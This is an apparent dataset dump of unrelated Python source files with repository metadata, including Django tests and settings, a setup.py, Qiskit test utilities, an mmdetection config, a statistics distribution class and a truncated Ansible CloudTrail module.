        self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
        result = self.manager.toggle_follow(
            email=self.follower_email,
            username='test_user',
            model_object=self.comment_test_follow
        )
        self.assertFalse(result)
        self.assertFalse(self.manager.is_following(self.follower_email, self.comment_test_follow))
    def test_toggle_follow_for_unfollower(self):
        """set the unfollower to follower and return true"""
        self.assertFalse(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
        result = self.manager.toggle_follow(
            email=self.unfollower_email,
            username='test_user',
            model_object=self.comment_test_follow
        )
        self.assertTrue(result)
        self.assertTrue(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
    def test_follow_parent_thread_for_comment_no_email(self):
        # A comment whose author has no email cannot follow anything.
        self.assertFalse(self.comment_without_email.email)
        self.assertFalse(self.manager.is_following(self.comment_without_email.email, self.comment_without_email))
        self.manager.follow_parent_thread_for_comment(self.comment_without_email)
        self.assertFalse(self.manager.is_following(self.comment_without_email.email, self.comment_without_email))
    # NOTE(review): COMMENT_ALLOW_SUBSCRIPTION is patched to False —
    # presumably so create_comment does not auto-follow; confirm against
    # the comment-creation signal handlers.
    @patch.object(settings, 'COMMENT_ALLOW_SUBSCRIPTION', False)
    def test_follow_parent_thread_for_comment_child_comment(self):
        child_comment = self.create_comment(self.content_object_1, user=self.user_2, parent=self.comment_without_email)
        # the parent (thread) will not be followed on creating child comment
        self.assertFalse(self.manager.is_following(child_comment.email, child_comment.content_object))
        # the parent comment (thread) is not followed yet
        self.assertFalse(self.manager.is_following(child_comment.email, self.comment_without_email))
        # child comment cannot be followed
        self.assertFalse(self.manager.is_following(child_comment.email, child_comment))
        self.manager.follow_parent_thread_for_comment(child_comment)
        # the parent (thread) will not be followed on creating child comment
        self.assertFalse(self.manager.is_following(child_comment.email, child_comment.content_object))
        # the parent is now followed
        self.assertTrue(self.manager.is_following(child_comment.email, self.comment_without_email))
        # child comment cannot be followed
        self.assertFalse(self.manager.is_following(child_comment.email, child_comment))
    @patch.object(settings, 'COMMENT_ALLOW_SUBSCRIPTION', False)
    def test_follow_parent_thread_for_comment_parent_comment(self):
        parent_comment = self.create_comment(self.content_object_1, user=self.user_2)
        # the parent (thread) is not followed yet
        self.assertFalse(self.manager.is_following(parent_comment.email, parent_comment.content_object))
        # parent comment is not followed yet
        self.assertFalse(self.manager.is_following(parent_comment.email, parent_comment))
        self.manager.follow_parent_thread_for_comment(parent_comment)
        # the parent (thread) is now followed
        self.assertTrue(self.manager.is_following(parent_comment.email, parent_comment.content_object))
        # parent comment is now followed
        self.assertTrue(self.manager.is_following(parent_comment.email, parent_comment))
    def test_get_all_followers_for_model_object(self):
        # filter_for_model_object must match a manual content-type filter.
        followers = self.manager.filter_for_model_object(self.comment_test_follow)
        content_type = ContentType.objects.get_for_model(self.comment_test_follow)
        self.assertNotEqual(followers.count(), 0)
        self.assertEqual(
            list(followers),
            list(self.manager.filter(content_type=content_type, object_id=self.comment_test_follow.id))
        )
    def test_get_get_emails_for_model_object(self):
        emails = self.manager.get_emails_for_model_object(self.comment_test_follow)
        self.assertIn(self.comment_test_follow.email, emails)
| [
"medsonnaftal@gmail.com"
] | medsonnaftal@gmail.com |
0914435a0dd3e06ec45e07ea57a79f9c4688419e | 471a036309c05b59243033f2480e27e19268ec55 | /src/london/setup.py | 574ffec30ba669a92a1fc8544c5c6533d47e5545 | [
"BSD-2-Clause"
] | permissive | avelino/votacao_paredao_bbb | 1bbf33b9ec00f033db5b1d558190135315d50b03 | 875ac157b207fee80be6841f9b17c41b7069e15d | refs/heads/master | 2021-01-20T12:17:48.362512 | 2012-07-13T05:41:44 | 2012-07-13T05:41:44 | 4,928,781 | 0 | 0 | null | 2020-07-27T11:05:32 | 2012-07-06T17:51:03 | Python | UTF-8 | Python | false | false | 1,682 | py | import london
import os
import sys
# Downloads setuptools if not find it before try to import
try:
import ez_setup
ez_setup.use_setuptools()
except ImportError:
pass
from setuptools import setup
def fullsplit(path, result=None):
    """
    Split a pathname into components (the opposite of os.path.join) in a
    platform-neutral way. Copied from Django.
    """
    parts = [] if result is None else result
    while True:
        head, tail = os.path.split(path)
        if head == '':
            return [tail] + parts
        if head == path:
            # os.path.split can no longer reduce the path (e.g. a root '/').
            return parts
        parts = [tail] + parts
        path = head
packages = []
data_files = []
london_dir = 'london'

# Walk the package tree, collecting Python packages and ancillary data files.
for dirpath, dirnames, filenames in os.walk(london_dir):
    # Prune hidden directories IN PLACE so os.walk does not descend into them.
    # The previous `del dirnames[i]` inside `enumerate` skipped the entry
    # following each deletion, so consecutive hidden directories survived.
    dirnames[:] = [d for d in dirnames if not d.startswith('.')]
    if '__init__.py' in filenames:
        # A directory containing __init__.py is a package: record its dotted path.
        packages.append('.'.join(fullsplit(dirpath)))
    elif filenames:
        # Non-package directories with files become data_files entries.
        data_files.append([dirpath, [os.path.join(dirpath, f) for f in filenames]])
if sys.version_info[0] >= 3:
install_requires = ['distribute', 'Jinja2', 'nose', 'PyDispatcher', 'BeautifulSoup4','python-money',
'tornado','pymongo==2.1.1']
else:
install_requires = ['distribute', 'Jinja2', 'nose', 'simplejson', 'PyDispatcher',
'BeautifulSoup==3.2.0','python-money','tornado','pymongo==2.1.1']
setup(
name='London',
version=london.__version__,
#url='',
author=london.__author__,
license=london.__license__,
packages=packages,
data_files=data_files,
scripts=['london/bin/london-admin.py','london/bin/london-create-project.py'],
install_requires=install_requires,
#setup_requires=[],
)
| [
"thiagoavelinoster@gmail.com"
] | thiagoavelinoster@gmail.com |
4c9cbf1a4a291e0732c209b2377e48be7480b156 | ec1059f4ccea10deb2cb8fd7f9458700a5e6ca4c | /venv/Lib/site-packages/qiskit/test/utils.py | 05433cc98a74738a7ca38e52e181892c3a231072 | [
"Apache-2.0",
"MIT"
] | permissive | shivam675/Quantum-CERN | b60c697a3a7ad836b3653ee9ce3875a6eafae3ba | ce02d9198d9f5a1aa828482fea9b213a725b56bb | refs/heads/main | 2023-01-06T20:07:15.994294 | 2020-11-13T10:01:38 | 2020-11-13T10:01:38 | 330,435,191 | 1 | 0 | MIT | 2021-01-17T16:29:26 | 2021-01-17T16:29:25 | null | UTF-8 | Python | false | false | 3,962 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Utils for using with Qiskit unit tests."""
import logging
import os
import unittest
from enum import Enum
from itertools import product
from qiskit import __path__ as qiskit_path
class Path(Enum):
    """Helper with paths commonly used during the tests.

    Note: inside the class body each name is still the plain string value
    (Enum members are only created once the body finishes executing), so
    later entries can build on SDK/TEST directly.
    """
    # Main SDK path: qiskit/
    SDK = qiskit_path[0]
    # test.python path: qiskit/test/python/
    TEST = os.path.normpath(os.path.join(SDK, '..', 'test', 'python'))
    # Examples path: examples/
    EXAMPLES = os.path.normpath(os.path.join(SDK, '..', 'examples'))
    # Schemas path: qiskit/schemas
    SCHEMAS = os.path.normpath(os.path.join(SDK, 'schemas'))
    # Sample QASMs path: qiskit/test/python/qasm
    QASMS = os.path.normpath(os.path.join(TEST, 'qasm'))
def setup_test_logging(logger, log_level, filename):
    """Set logging to file and stdout for a logger.

    Args:
        logger (Logger): logger object to be updated.
        log_level (str): logging level name (e.g. ``'DEBUG'``); any
            unrecognized name falls back to ``INFO``.
        filename (str): name of the output file.
    """
    # Set up formatter.
    log_fmt = ('{}.%(funcName)s:%(levelname)s:%(asctime)s:'
               ' %(message)s'.format(logger.name))
    formatter = logging.Formatter(log_fmt)

    # Set up the file handler.
    file_handler = logging.FileHandler(filename)
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)

    if os.getenv('STREAM_LOG'):
        # Set up the stream handler.
        stream_handler = logging.StreamHandler()
        stream_handler.setFormatter(formatter)
        logger.addHandler(stream_handler)

    # Resolve the level through the public API instead of the private
    # logging._nameToLevel mapping: getLevelName returns an int for known
    # level names and a string for unknown ones, so fall back to INFO
    # whenever the result is not an int.
    level = logging.getLevelName(log_level)
    if not isinstance(level, int):
        level = logging.INFO
    logger.setLevel(level)
# NOTE(review): this subclasses a private unittest API
# (unittest.case._AssertLogsContext) and may break across Python versions.
class _AssertNoLogsContext(unittest.case._AssertLogsContext):
    """A context manager used to implement TestCase.assertNoLogs()."""

    # pylint: disable=inconsistent-return-statements
    def __exit__(self, exc_type, exc_value, tb):
        """
        This is a modified version of TestCase._AssertLogsContext.__exit__(...)
        """
        # Restore the logger to its pre-context configuration.
        self.logger.handlers = self.old_handlers
        self.logger.propagate = self.old_propagate
        self.logger.setLevel(self.old_level)
        if exc_type is not None:
            # let unexpected exceptions pass through
            return False
        # Inverted check vs. the parent class: fail when ANY record at or
        # above the requested level was captured.
        if self.watcher.records:
            msg = 'logs of level {} or higher triggered on {}:\n'.format(
                logging.getLevelName(self.level), self.logger.name)
            for record in self.watcher.records:
                msg += 'logger %s %s:%i: %s\n' % (record.name, record.pathname,
                                                  record.lineno,
                                                  record.getMessage())
            self._raiseFailure(msg)
class Case(dict):
    """A single parameter combination for a generated test case.

    Behaves like a plain dict of parameter name -> value, but also accepts
    dynamic attributes (``__doc__``, ``__name__``) set by generate_cases.
    """


def generate_cases(docstring, dsc=None, name=None, **kwargs):
    """Combines kwargs in cartesian product and creates Case with them.

    Args:
        docstring (str): template for each case's ``__doc__``, formatted with
            the case's own key/value pairs; overridden by ``dsc``.
        dsc (str): alternative docstring template; takes precedence over
            ``docstring`` when both are given.
        name (str): template for each case's ``__name__``.
        **kwargs: iterables of parameter values; one Case is produced per
            element of their cartesian product.

    Returns:
        list[Case]: all generated parameter combinations.
    """
    ret = []
    keys = kwargs.keys()
    for values in product(*kwargs.values()):
        case = Case(zip(keys, values))
        # dsc wins over docstring (the original formatted both and kept the
        # dsc result); format only the template that is actually kept.
        doc_template = dsc if dsc is not None else docstring
        if doc_template is not None:
            case.__doc__ = doc_template.format(**case)
        if name is not None:
            case.__name__ = name.format(**case)
        ret.append(case)
    return ret
| [
"vinfinitysailor@gmail.com"
] | vinfinitysailor@gmail.com |
c27e540e1dee4537be8ca6378dc757a16a9ff8d0 | 801510e45d9aebe5c5b8b09a3ce4453a3a11a3ca | /django/full_stack_django/amadon/amadon/settings.py | c8a2b95ae4b1da6df15ff14bd3426de162c50844 | [] | no_license | michelleshan/coding_dojo_python_course | 5581ebca0a645ba7231a2da2d2d64d6c3735bfc4 | e20e8195950004ef0aa09e6b0f84e7f05bd355e8 | refs/heads/master | 2022-11-21T01:34:54.309175 | 2020-07-16T03:29:45 | 2020-07-16T03:29:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,103 | py | """
Django settings for amadon project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^y#+bl%#tl6dws0l$moo_3o-su_^kjym5l*x!+!dlrhvv#m$+h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'amadon_app'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'amadon.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'amadon.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"michellehan@Michelles-Air.attlocal.net"
] | michellehan@Michelles-Air.attlocal.net |
261a0e0bb3133e20df3e76e1fdd109448d018b8c | 9ef7093ffa3bbb916e197ba6788aa3c13dc034dd | /configs/underwaterdataset/reppoints_moment_r50_fpn_2x_mt.py | a03ed5bd5954ecf0b1fa1cdec5e5f447f67c00c3 | [
"Apache-2.0"
] | permissive | coldsummerday/mmdetection-zhou | aae3b50ecddf227f0802c2e5b51622168714fab5 | c333f06f4ffb22131a6f30e6468c82b926e5c87f | refs/heads/master | 2020-12-10T07:34:49.813269 | 2020-03-10T08:52:10 | 2020-03-10T08:52:10 | 233,536,042 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,428 | py | # model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=5,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='moment'))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'UnderWaterDataset'
data_root = '/home/ices18/data/underwaterobjectdetection/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=[(1333, 480), (1333, 960)],
keep_ratio=True,
multiscale_mode='range'),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=4,
workers_per_gpu=2,
train=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.0025, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[16, 22])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 24
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/reppoints_moment_r50_fpn_2x_mt'
load_from = None
resume_from = None
auto_resume = True
workflow = [('train', 1)]
| [
"2808972009@qq.com"
] | 2808972009@qq.com |
0c808994fa59f2de1512003d66c1b90c255c8e86 | 147648c6b25ecc33e82a36b36de6623df9340e62 | /examples/docs_snippets/docs_snippets/legacy/dagster_pandas_guide/shape_constrained_trip.py | 919727954440fecaff0a49b7ac4c1ac7266f5a30 | [
"Apache-2.0"
] | permissive | asdlei99/dagster | be81009ff00dbad02f7cec974650388a5cc2af59 | bbfd1a22e85a10881d7dbbcc888957a487f0c3e5 | refs/heads/master | 2023-08-28T07:18:23.838943 | 2021-11-08T23:09:07 | 2021-11-08T23:09:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 820 | py | from datetime import datetime
from dagster import Out, job, op
from dagster.utils import script_relative_path
from dagster_pandas import RowCountConstraint, create_dagster_pandas_dataframe_type
from pandas import DataFrame, read_csv
# start_create_type
ShapeConstrainedTripDataFrame = create_dagster_pandas_dataframe_type(
name="ShapeConstrainedTripDataFrame", dataframe_constraints=[RowCountConstraint(4)]
)
# end_create_type
@op(out=Out(ShapeConstrainedTripDataFrame))
def load_shape_constrained_trip_dataframe() -> DataFrame:
return read_csv(
script_relative_path("./ebike_trips.csv"),
parse_dates=["start_time", "end_time"],
date_parser=lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S.%f"),
)
@job
def shape_constrained_trip():
load_shape_constrained_trip_dataframe()
| [
"noreply@github.com"
] | asdlei99.noreply@github.com |
02f6ddcfd40e620fba1b316addc8157b0fccbf16 | 8a74a679fd53fa909d4cc7221d477ce21a1c3566 | /PYTHON/remove_duplicates.py | e5dae22358ca2965e82c5cf9443a3104ca841f0f | [
"MIT"
] | permissive | pawarspeaks/HACKTOBERFEST2021-2 | 1082245d10d1bd76a4b9900223e701ab95b881e8 | 1b53ba18b78d489c2b13d331d70e35e8a8566e93 | refs/heads/main | 2023-09-01T11:11:05.310810 | 2021-10-30T16:20:42 | 2021-10-30T16:20:42 | 422,931,347 | 4 | 0 | MIT | 2021-10-30T16:20:06 | 2021-10-30T16:20:05 | null | UTF-8 | Python | false | false | 599 | py | # Question Link : https://leetcode.com/problems/remove-duplicates-from-sorted-list/
class Solution:
def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:
prev = head
current = head
if head:
val = head.val
head = head.next
while (head != None):
if head.val == val:
prev.next = head.next
head = head.next
else:
val = head.val
prev = head
head = head.next
return current
| [
"noreply@github.com"
] | pawarspeaks.noreply@github.com |
05877846d04c4a9261d06974e881b4c047c5ef65 | ee4d59c295d3060077f5dc3e35aaf0458b31eb32 | /Main/VideoFilter/ConvolutionFiltering/BlurAvgApi.py | 95c97dd9fbeae3b5295c9e3a2bc9194bb5231df4 | [] | no_license | GeonwooVincentKim/Python_OpenCV_MiniProject | eb82f9102352f0fc809c05eeaddbceffaf4e1313 | c59f99ba74a07e6b2b442bf95b90f041f42d2521 | refs/heads/master | 2023-04-22T14:33:41.219214 | 2021-04-20T12:18:34 | 2021-04-20T12:18:34 | 298,581,249 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | import cv2
import numpy as np
file_name = '../../../img/taekwonv1.jpg'
img = cv2.imread(file_name)
blur1 = cv2.blur(img, (10, 10))
blur2 = cv2.boxFilter(img, -1, (10, 10))
merged = np.hstack((img, blur1, blur2))
cv2.imshow('blur', merged)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"kdsnop@gmail.com"
] | kdsnop@gmail.com |
7f93cd2bf483be0a0bf39ca8ca709c19d84c5988 | 3b504a983f1807ae7c5af51078bfab8c187fc82d | /client/gui/HUD2/features/BattleReplay/BattleReplayModel.py | d21709f49d792212b7e0c0469bd4dca973d7509b | [] | no_license | SEA-group/wowp_scripts | 7d35fd213db95ea6b3dbd1ec6d3e0f13de86ba58 | 2fe54a44df34f2dcaa6860a23b835dcd8dd21402 | refs/heads/master | 2021-09-07T23:10:13.706605 | 2018-03-02T17:23:48 | 2018-03-02T17:23:48 | 117,280,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | # Embedded file name: scripts/client/gui/HUD2/features/BattleReplay/BattleReplayModel.py
from gui.HUD2.core.AutoFilledDataModel import AutoFilledDataModel
from gui.HUD2.core.DataModel import Structure, FloatT, BoolT, StringT
from gui.HUD2.features.BattleReplay.BattleReplayController import BattleReplayController
from gui.HUD2.features.BattleReplay.BattleReplaySource import BattleReplaySource
class BattleReplayModel(AutoFilledDataModel):
DATA_SOURCE = BattleReplaySource
CONTROLLER = BattleReplayController
SCHEME = Structure(panelVisibility=BoolT, speed=StringT, isPaused=BoolT, timeMax=FloatT, timeCurrent=FloatT)
source = None | [
"55k@outlook.com"
] | 55k@outlook.com |
1919b311e39568cc7ff40ef676dad61a16346bb4 | 10e1d1ec2eb7d1ff991d4286006dbbaa5a5e1760 | /dist/src/dists/logdagum.py | 4c1d97a901cf2c449eb0e094a7f17cded07d0f12 | [] | no_license | mudkip201/distributions | dd904d462fedf97012ed8057244b0ac496392352 | dc8b6e3a6b59c1552c9726f760b047eaff3f32ef | refs/heads/master | 2020-11-29T15:23:21.580157 | 2017-11-20T20:40:29 | 2017-11-20T20:40:29 | 87,482,965 | 1 | 0 | null | 2017-07-19T17:11:47 | 2017-04-06T23:06:26 | Python | UTF-8 | Python | false | false | 2,121 | py | '''
Created on Jul 18, 2017
@author: matthewcowen-green
'''
import dists.Distribution.Distribution as Distribution
import dists.Distribution as ds
import math
import scipy.special as sp
class logdagum(Distribution):
@staticmethod
def pdf(b,d,l,x):
return b*l*d*math.exp(-d*x)*math.pow(1+l*math.exp(-d*x),-b-1)
@staticmethod
def cdf(b,d,l,x):
return math.pow(1+l*math.exp(-d*x),-b)
@staticmethod
def random(b,d,l):
u=ds.rg0()
return math.log(l/(math.pow(u,-1/b)-1))/d
@staticmethod
def mean(b,d,l):
return (math.log(l)+sp.digamma(b)-sp.digamma(1))/d
@staticmethod
def median(b,d,l):
return math.log(l/(math.pow(1/2,-1/b)-1))/d
@staticmethod
def mode(b,d,l):
if(b*d>1):
return math.log(l*b)/d
return None
@staticmethod
def variance(b,d,l):
return ((sp.polygamma(3,b)+sp.polygamma(3,1))+math.pow(logdagum.mean(b,d,l),2))/math.pow(d,2)-math.pow(logdagum.mean(b,d,l),2)
@staticmethod
def stddev(b,d,l):
return math.sqrt(logdagum.variance(b,d,l))
@staticmethod
def kurtosis(b,d,l):
e1=sp.polygamma(5,b)+sp.polygamma(5,1)
e2=3*(sp.polygamma(3,b)+sp.polygamma(3,1))**2
e3=4*(math.log(l)+sp.digamma(b)-sp.digamma(1))*(sp.polygamma(4,b)-sp.polygamma(4,1))
e4=6*(math.log(l)+sp.digamma(b)-sp.digamma(1))**2*(sp.polygamma(3,b)+sp.polygamma(3,1))
e5=(math.log(l)+sp.digamma(b)-sp.digamma(1))**4
return (e1+e2+e3+e4+e5)/(d**4)/logdagum.variance(b,d,l)**2
@staticmethod
def entropy():
pass
@staticmethod
def skewness(b,d,l):
e1=sp.polygamma(4,b)-sp.polygamma(4,1)
e2=math.pow(math.log(l)+sp.digamma(b)-sp.digamma(1),3)
e3=3*(math.log(l)+sp.digamma(b)-sp.digamma(1))*(sp.polygamma(3,b)+sp.polygamma(3,1))
return ((e1+e2+e3)/(d**3)-3*logdagum.mean(b,d,l)*logdagum.variance(b,d,l)-logdagum.mean(b,d,l)**3)/logdagum.stddev(b,d,l)**3
@staticmethod
def ppf(b,d,l,q):
return math.log(l/(math.pow(q,-1/b)-1))/d
@staticmethod
def mle():
pass | [
"mudkipcg@yahoo.om"
] | mudkipcg@yahoo.om |
a528126e75a4f20eaadf3ed8b12152ba16d83163 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/92b3d792837f65e6264ce4b4a4fb1459dad94a6e-<main>-bug.py | 5bbb64f1f31e353b094838ed127dd869876130a3 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,787 | py |
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(state=dict(default='present', choices=['present', 'absent', 'enabled', 'disabled']), name=dict(default='default'), enable_logging=dict(default=True, type='bool'), s3_bucket_name=dict(), s3_key_prefix=dict(), sns_topic_name=dict(), is_multi_region_trail=dict(default=False, type='bool'), enable_log_file_validation=dict(default=False, type='bool', aliases=['log_file_validation_enabled']), include_global_events=dict(default=True, type='bool', aliases=['include_global_service_events']), cloudwatch_logs_role_arn=dict(), cloudwatch_logs_log_group_arn=dict(), kms_key_id=dict(), tags=dict(default={
}, type='dict')))
required_if = [('state', 'present', ['s3_bucket_name']), ('state', 'enabled', ['s3_bucket_name'])]
required_together = [('cloudwatch_logs_role_arn', 'cloudwatch_logs_log_group_arn')]
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True, required_together=required_together, required_if=required_if)
if (not HAS_BOTO3):
module.fail_json(msg='boto3 is required for this module')
if (module.params['state'] in ('present', 'enabled')):
state = 'present'
elif (module.params['state'] in ('absent', 'disabled')):
state = 'absent'
tags = module.params['tags']
enable_logging = module.params['enable_logging']
ct_params = dict(Name=module.params['name'], S3BucketName=module.params['s3_bucket_name'], IncludeGlobalServiceEvents=module.params['include_global_events'], IsMultiRegionTrail=module.params['is_multi_region_trail'], EnableLogFileValidation=module.params['enable_log_file_validation'], S3KeyPrefix='', SnsTopicName='', CloudWatchLogsRoleArn='', CloudWatchLogsLogGroupArn='', KmsKeyId='')
if module.params['s3_key_prefix']:
ct_params['S3KeyPrefix'] = module.params['s3_key_prefix'].rstrip('/')
if module.params['sns_topic_name']:
ct_params['SnsTopicName'] = module.params['sns_topic_name']
if module.params['cloudwatch_logs_role_arn']:
ct_params['CloudWatchLogsRoleArn'] = module.params['cloudwatch_logs_role_arn']
if module.params['cloudwatch_logs_log_group_arn']:
ct_params['CloudWatchLogsLogGroupArn'] = module.params['cloudwatch_logs_log_group_arn']
if module.params['kms_key_id']:
ct_params['KmsKeyId'] = module.params['kms_key_id']
try:
(region, ec2_url, aws_connect_params) = get_aws_connection_info(module, boto3=True)
client = boto3_conn(module, conn_type='client', resource='cloudtrail', region=region, endpoint=ec2_url, **aws_connect_params)
except ClientError as err:
module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))
results = dict(changed=False, exists=False)
trail = get_trail_facts(module, client, ct_params['Name'])
if (trail is not None):
results['exists'] = True
if ((state == 'absent') and results['exists']):
results['changed'] = True
results['exists'] = False
results['trail'] = dict()
if (not module.check_mode):
delete_trail(module, client, trail['TrailARN'])
elif ((state == 'present') and results['exists']):
do_update = False
for key in ct_params:
tkey = str(key)
if (key == 'EnableLogFileValidation'):
tkey = 'LogFileValidationEnabled'
if (ct_params.get(key) == ''):
val = None
else:
val = ct_params.get(key)
if (val != trail.get(tkey)):
do_update = True
results['changed'] = True
if module.check_mode:
trail.update({
tkey: ct_params.get(key),
})
if ((not module.check_mode) and do_update):
update_trail(module, client, ct_params)
trail = get_trail_facts(module, client, ct_params['Name'])
if (enable_logging and (not trail['IsLogging'])):
results['changed'] = True
trail['IsLogging'] = True
if (not module.check_mode):
set_logging(module, client, name=ct_params['Name'], action='start')
if ((not enable_logging) and trail['IsLogging']):
results['changed'] = True
trail['IsLogging'] = False
if (not module.check_mode):
set_logging(module, client, name=ct_params['Name'], action='stop')
tag_dry_run = False
if module.check_mode:
tag_dry_run = True
tags_changed = tag_trail(module, client, tags=tags, trail_arn=trail['TrailARN'], curr_tags=trail['tags'], dry_run=tag_dry_run)
